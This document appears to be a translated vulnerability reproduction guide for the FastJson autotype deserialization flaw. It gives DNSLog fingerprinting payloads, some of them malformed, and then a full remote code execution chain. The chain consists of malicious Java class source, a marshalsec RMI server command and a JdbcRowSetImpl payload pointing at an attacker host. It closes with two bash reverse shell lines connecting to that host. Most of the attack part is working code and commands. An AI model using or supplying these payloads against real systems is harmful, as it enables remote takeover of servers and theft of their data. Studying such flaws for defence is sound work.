introduce:
FastJson is a Java library that can convert Java objects to JSON format, and of course it can also convert JSON strings to Java objects.
In the process of parsing json, FastJson supports using the @type field to specify the type of deserialization, and calls the set/get method of this class to access the property. When the component turns on the autotype function and deserializes untrusted data, the attack can construct data.
A detailed description
When the vulnerability utilizes FastJson autotype to process Json objects, the @type field does not perform complete security verification. An attacker can pass in a dangerous class, and call the dangerous class to connect to the remote RMI host, and execute code through the malicious class. In this way, attackers can implement remote code execution vulnerabilities, obtain sensitive server information, and even use this vulnerability to further operate on server data.
Fingerprinting of fastjson:
1. Error report echo information to judge fastjson, fastjson without special configuration, if there is no correct closure, an error will be reported, and the words fastjson will be displayed in the returned result
2. dnslog blind typing judgment fastjson
Before version 1.2.67
{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}
After version 1.2.67
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
Malformation
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
POC:
To be nested inside zeo
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{ {"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{ {"@type":"java.net.URL","val":"dnslog"}:0
Fastjson1.2.24 deserialization vulnerability recurrence:
Host A: Host with fastjson deserialization vulnerability
Host C: serving RMI/LDAP
Host B: Constructed malicious class (contains commands to be executed)
Throughout the remote command execution process:
1. The hacker uses the payload to attack host A (the payload needs to specify the rmi/ldap address)
2. Host A triggers a deserialization vulnerability and sends an rmi remote distribution call to connect to host C
3. The rmi service of host C specifies to load the malicious java class of host B, so host A finally loads and executes the malicious java class of host B through the rmi service of host C
4. Host A triggers malicious system command execution
Vulnerability recurrence
kali install java version
cd /opt
curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
tar zxvf jdk-8u20-linux-x64.tar.gz
rm -rf /usr/bin/java*
ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
javac -version
java -version
compile malicious class
javac Exploit.java
Exploit.java source code is as follows
import java.lang.Runtime;
import java.lang.Process;
public class Exploit{
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/hel10"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
Then start the web service, so that the rmi service can get the malicious class.
Then open the RMI service monitoring
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.133:8888/#Exploit" 9999 
Then use the payload to attack the target host
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.88.133:9999/Exploit",
"autoCommit":true
}
}The target host triggers the deserialization vulnerability and actively performs RMI remote calls to connect to the VPS. RMI specifies that the malicious java class on the VPS is loaded, so the target host remotely loads and calls the malicious java class on the VPS through the RMI service.
If you rebound the shell, just modify the contents of the malicious java:
"/bin/bash","-c","exec 5<>/dev/tcp/192.168.88.133/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"
"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.88.133/1234 0>&1"